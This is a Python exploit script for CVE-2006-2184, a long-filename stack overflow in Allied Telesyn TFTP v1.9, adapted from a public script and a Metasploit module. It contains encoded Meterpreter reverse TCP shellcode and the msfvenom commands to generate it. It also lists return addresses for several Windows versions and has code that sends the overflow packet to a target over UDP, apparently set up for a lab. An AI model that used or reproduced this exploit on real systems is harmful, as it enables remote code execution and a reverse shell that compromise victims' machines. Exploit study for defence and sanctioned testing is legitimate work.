Modified version of CVE-2006-2184 python script found here: https://github.com/Re4son/AT-TFTP_Long_Filename/blob/master/attftp_long_filename.py
#!/usr/bin/env python
import sys
import struct
import socket as so
print '#######################################################################'
print '# CVE-2006-2184 - Allied Telesyn TFTP v1.9 Long Filename Overflow #'
print '# This is a modified version of Re4son\'s code #'
print '# (https://github.com/Re4son/AT-TFTP_Long_Filename) #'
print '# The return addresses are ported from metasploit module #'
print '# exploit/windows/tftp/attftp_long_filename #'
print '#######################################################################\n'
# Shellcode - Staged Meterpreter Reverse TCP (NONX)
# Badchars: \x00
# StackAdjustment: -3500
# Payload size: 210 bytes
# Generation instructions:
# printf '\x81\xec\xac\x0d\x00\x00' > payload # sub exp, 0xdac / nop / nop
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.95 LPORT=443 \
# -a x86 --platform Windows -e generic/none -f raw >> payload
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c
SHELLCODE = (
"\xdb\xd6\xd9\x74\x24\xf4\xbe\xcf\xa5\x10\xfb\x5f\x29\xc9\xb1\x2e"
"\x83\xc7\x04\x31\x77\x16\x03\x77\x16\xe2\x3a\x24\xfc\x57\xc9\x27"
"\xfd\x5b\xbb\xcc\xba\x4b\xc2\xec\xba\x73\x54\x22\x9e\x07\xe9\x78"
"\xab\x64\x2c\xf9\xaa\x7b\xc5\xae\x8c\x82\x33\xdb\xf9\x1e\xc2\x32"
"\x30\xdf\x5d\x66\xf2\x15\x50\x76\x37\x2d\xaa\x0d\x41\x6d\x4c\xd7"
"\x67\x07\x73\x6c\xf3\xa7\x57\x72\xea\x5e\x1c\x68\xb5\x15\x6d\x8d"
"\x44\xc3\x72\x81\xdf\x9a\x18\xfd\xc3\xfd\x1f\x1d\xca\x26\xbb\x55"
"\x6e\xe9\xc8\x2a\x7d\x82\xbe\xb6\xd0\x1f\x56\xcf\x74\x46\xf5\xa9"
"\xe0\xb5\xcb\x5d\x86\xca\x19\xc1\x3c\x4b\xe4\x8f\xdc\x6c\xc0\xe5"
"\x4e\xc0\xbf\x56\x32\xb5\x7c\x0a\x3d\xde\xe4\x2d\xd2\x29\xea\x7a"
"\x7e\x4c\x53\x63\x5f\x6f\x75\x0a\xd9\x38\x16\x2c\xcf\xae\x80\xd8"
"\xfb\xd0\x0f\xbb\x93\xd1\x14\x25\x37\x5b\x89\xc0\xa7\x08\x1a\x73"
"\x71\xf9\xa1\x84\x57\x56\x1d\x76\x08\x04\x0a\xd4\xce\x13\x74\xe2"
"\xf1\x82"
)
def set_return(target):
if target == '1':
print '[+] Selecting target: Windows NT SP4 English'
retaddr = struct.pack('<L', 0x702ea6f7)
elif target == '2':
print '[+] Selecting target: Windows 2000 SP0 English'
retaddr = struct.pack('<L', 0x750362c3)
elif target == '3':
print '[+] Selecting target: Windows 2000 SP1 English'
retaddr = struct.pack('<L', 0x75031d85)
elif target == '4':
print '[+] Selecting target: Windows 2000 SP2 English'
retaddr = struct.pack('<L', 0x7503431b)
elif target == '5':
print '[+] Selecting target: Windows 2000 SP3 English'
retaddr = struct.pack('<L', 0x74fe1c5a)
elif target == '6':
print '[+] Selecting target: Windows 2000 SP4 English'
retaddr = struct.pack('<L', 0x75031dce)
elif target == '7':
print '[+] Selecting target: Windows XP SP0/1 English'
retaddr = struct.pack('<L', 0x71ab7bfb)
elif target == '8':
print '[+] Selecting target: Windows XP SP2 English'
retaddr = struct.pack('<L', 0x71ab9372)
elif target == '9':
print '[+] Selecting target: Windows XP SP3 English'
retaddr = struct.pack('<L', 0x7e429353) # ret by c0re
elif target == '10':
print '[+] Selecting target: Windows Server 2003'
retaddr = struct.pack('<L', 0x7c86fed3) # ret donated by securityxxxpert
elif target == '11':
print '[+] Selecting target: Windows Server 2003 SP2'
retaddr = struct.pack('<L', 0x7c86a01b) # ret donated by Polar Bear
else:
print '[-] Target not supported or invalid target specified!'
sys.exit(-1)
return retaddr
def build_payload(shellcode, retaddr, lhost):
# Let's build the payload
print '[+] Constructing payload.'
# Create NOP sled to brin NOPs & LHOST to 25 bytes
nops = "\x90" * (25 - len(lhost))
tail = "" # tail from metasploit
tail += "\x83\xc4\x28\xc3" # add esp, 0x28 / ret
tail += "\x00netascii\x00" # Finish as expected by the AT TFTP server
payload = "\x00\x02" + nops + shellcode + retaddr + tail
return payload
def send_packet(payload, rhost, rport):
# Declare a UDP socket
s = so.socket(so.AF_INET, so.SOCK_DGRAM)
print "[+] Delivering package..."
try:
s.sendto(payload, (rhost, rport))
except OSError:
print "[-] Could not connect to " + rhost + ":" + str(rport) + "!"
sys.exit(-1)
print "[+] Package delivered!"
def main():
try:
RHOST = sys.argv[1] # Target IP address as command line argument
RPORT = int(sys.argv[2]) # Target Port as command line argument
LHOST = sys.argv[3] # Attackers IP address
TARGET = sys.argv[4] if len(sys.argv) > 4 else '10' # The target system
except IndexError:
print '[-] Usage: %s <RHOST> <RPORT> <LHOST> [<TARGET>]' % sys.argv[0]
print '[-] Example: %s 10.11.1.226 69 10.11.0.95' % sys.argv[0]
print '[-]'
print '[-] Available Targets (* = Default):'
print '[-] 1 - Windows NT SP4 English'
print '[-] 2 - Windows 2000 SP0 English'
print '[-] 3 - Windows 2000 SP1 English'
print '[-] 4 - Windows 2000 SP2 English'
print '[-] 5 - Windows 2000 SP3 English'
print '[-] 6 - Windows 2000 SP4 English'
print '[-] 7 - Windows XP SP0/1 English'
print '[-] 8 - Windows XP SP2 English'
print '[-] 9 - Windows XP SP3 English'
print '[-] * 10 - Windows Server 2003'
print '[-] 11 - Windows Server 2003 SP2'
sys.exit(-1)
RETADDR = set_return(TARGET)
PAYLOAD = build_payload(SHELLCODE, RETADDR, LHOST)
send_packet(PAYLOAD, RHOST, RPORT)
if __name__ == '__main__':
main()